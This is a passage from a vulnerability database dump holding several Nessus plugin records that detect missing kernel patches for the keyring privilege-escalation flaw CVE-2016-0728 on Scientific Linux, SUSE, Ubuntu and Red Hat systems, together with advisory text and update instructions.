value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a security fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with join_session_keyring() could lead to local attackers gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0186-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0186-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88140);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160186-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b46e576\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-124=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-124=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-124=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:29", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2871-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88013);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "RHEL 7 : kernel (RHSA-2016:0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88173);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", 